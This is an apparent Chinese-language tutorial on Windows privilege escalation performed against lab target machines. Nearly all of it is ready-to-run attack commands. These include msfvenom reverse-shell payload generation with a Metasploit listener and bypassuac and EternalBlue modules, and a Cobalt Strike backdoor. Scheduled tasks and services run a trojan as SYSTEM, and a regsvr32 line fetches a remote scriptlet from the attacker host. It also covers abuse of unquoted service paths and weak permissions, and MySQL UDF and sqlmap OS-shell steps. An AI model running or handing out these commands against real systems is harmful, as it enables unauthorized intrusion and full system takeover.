windows提权的几种姿势

一、工具提权

1、msf提权

准备阶段：

用msfvenom生成一个马：msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f exe > 3.exe

然后用msf开启一个监听：

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.112

set lport 4444

exploit

在windows靶机上执行3.exe，得到监听会话

提权：

1.1、getsystem提权

在meterpreter中尝试用getsystem进行提权，不过大多数情况下直接用getsystem提权是会失败的。（最好还是尝试一下，万一成功了呢）

1.2、利用bypassuac模块进行提权

search bypassuac

msf提供了很多bypassuac的模块，最后两个是针对win10的，其他的并没有做特殊的说明，实战时我们只能自己去测试了。

经测试，这里第三个模块就可以成功提权

use exploit/windows/local/bypassuac_eventvwr

set session 1

exploit

bypassuac的模块只用设置session参数就可以了，如果成功就会返回一个新的会话，这时再用getsystem进行提权即可

1.3、漏洞提权

提权辅助网页：https://bugs.hacking8.com/tiquan/

提权辅助网页可以帮助我们查询该靶机上有没有可以用来提权的漏洞补丁，把靶机上systeminfo的信息粘贴进去

这里找到了很多的漏洞补丁，这时你可以去网上根据漏洞编号搜索下载payload，也可以用msf的search命令，看看有没有这个模块

ms17-010（永恒之蓝）被search到了

use exploit/windows/smb/ms17_010_eternalblue

先查看一下需要设置的参数

show options

发现这里只需要设置rhosts这个参数

set rhosts 192.168.1.110

exploit

得到新会话后发现直接就是system权限

1.4、windows-exploit-suggester（提权辅助工具）

这个提权辅助工具和上面的提权辅助网页是差不多的，都是可以查出漏洞补丁

安装及使用方法：

windows-exploit-suggester的源码可以直接从gethub上找到：https://github.com/AonCyberLabs/Windows-Exploit-Suggester

脚本需要python2的环境和xlrd库

解压后运行python2 windows-exploit-suggester.py --update，之后会生成一个xls文件，这个文件不用打开，它主要的作用就是作为数据库来对漏洞信息进行比对

用pip2安装xlrd库：pip2 install xlrd --upgrade

把靶机中systeminfo的信息写入win.txt中，然后把win.txt文件放到与windows-exploit-suggester.py所在的同一目录下

使用命令“python2 windows-exploit-suggester.py --database 2020-08-15-mssb.xls --systeminfo win.txt”查看有没有可以用来提权的漏洞补丁

和提权辅助网页一样，也显示出了漏洞编号

1.5、msf内置补丁查询模块

在meterpreter下运行：run post/windows/gather/enum_patches，可以罗列出该靶机上可以利用的地方

2、cs提权

准备工作：

在cs上创建一个监听，监听名字随便取

用cs生成一个后门artifact.exe，选择刚才创建的监听器

在目标靶机上执行artifact.exe，cs就会得到一个会话

提权：

2.1、getsystem提权

进入Beacon，在Beacon尝试用getsystem进行提权，跟msf的getsystem提权一样，大多数情况下也是会失败的。

2.2、用bypassuac进行提权

右击目标然后选择执行——>提权

exploit里是内置的提权模块，由于我加载了拓展，所以提权模块比官网的多几个，最下面两个uac开头就是bapassuac提权模块，

选择uac-token-dupication模块进行提权，如果提权成功就会返回一个新的会话

2.3、漏洞提权

除了bypassuac的几个提权模块，其他的就是漏洞提权模块了，和上述一样，如果成功就会返回新的会话

二、命令提权

1、at命令提权

在Windows2000、Windows 2003、Windows XP这三类系统中，我们可以轻松将Administrators组下的用户权限提升到SYSTEM。

at是一个发布定时任务计划的命令行工具，语法比较简单。用at命令发布的定时任务计划，Windows 默认以SYSTEM权限运行。

语法: at 时间 命令

例子: at 22:00 shutdown -s

该命令的作用是在晚上10点定时关机该命令的作用是在晚上10点定时关机

at 10:45PM /interactive c:\3.exe

在10:45执行木马3.exe，这时用msf监听到的会话就是system权限的了

msf内置有exploit/multi/script/web_delivery模块，可以配合at命令进行提权

use exploit/multi/script/web_delivery

set lhost 192.168.1.112

set payload windows/meterpreter/reverse_tcp

set target 3

expolit

由于这是windows靶机，target参数我们一般会选2 powershell，或者3 Regsvr32，但由于我们这里没有powershell，所以就选Regsvr32了

在2003里执行命令：

at 16:43 /interactive regsvr32 /s /n /u /i:http://192.168.1.112:8080/qYz3TcUs.sct scrobj.dll

"/interactive"可以开启界面交互模式

好像没有成功

不过我们还可以直接用at命令执行木马进行提权

监听到的会话直接就是system权限

sc命令提权

适用系统：windows7、8、03、08、12、16

SC是用于与服务控制管理器和服务进行通信的命令行程序。

sc Create syscmd binPath= "cmd /K start" type= own type= interact

创建一个名叫syscmd的cmd服务，我们也可以把binPath换成木马的路径，这样就可以获得一个system权限的会话

然后执行sc start syscmd,就得到了一个system权限的cmd

把binPath换成木马路径

同样可以得到system权限的会话

三、配置提权

1、不带引号的服务路径

当系统管理员配置Windows服务时，他们必须指定要执行的命令,或者运行可执行文件的路径。

当Windows服务运行时，会发生以下两种情况之一。如果给出了可执行文件，并且引用了完整路径，则系统会按字面解释它并执行。但是，如果服务的二进制路径未包含在引号中，则操作系统将会执行找到的空格分隔的服务路径的第一个实例。

示例：

C:\Program Files\Vulnerable Service\Sub Directory\service.exe

Windows命令解释程序可能会遇到名称中的空格，并且希望通过将字符串包装在引号中来对它们进行转义。在上面的示例中，如果系统运行该服务，它将尝试运行以下可执行文件:

C:\Program .exe
C:\Program Files\Vulnerable. exe
C:\Program Files\Vulnerable Service\Sub.exe
C:\Program Files\Vulnerable Service\Sub Directory\service.exe

我们可以使用以下命令查看错误配置的路径：

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

sc qc 服务名称: 查看是否为自启动

msf内置了一个针对错误配置进行提权的模块：exploit/windows/local/trusted_service_path

2、弱文件夹权限

寻找一个允许任意用户修改的服务，并且权限是高权用户所执行的，得到所有用户都可以访问的结果后，生成一个exe将其改名为服务启动的exe替换，或者直接把存放服务指定二进制的文件夹给改名了，自己在创建服务指定的二进制文件的文件夹。

3、弱服务权限

msf内置了弱服务提权的模块：exploit/windows/local/service_permissions

四、数据库提权

mysql提权

提权要求：

win7以下版本

数据库小于5.7

拥有root权限

没有开启安全模式

提权方法：

sqlmap

sqlmap -d “mysql://root:root@192.168.0.109:3306/mysql” --os-shell

手动

C:\phpStudy\PHPTutorial\MySQL\lib\plugin\\udf.dll

CREATE FUNCTION shell RETURNS STRING SONAME ‘udf.dll’

select shell(‘cmd’,‘whoami’)

tips：

大于5.1————lib\plugin

小于5.1————C:\windows\system32(2003)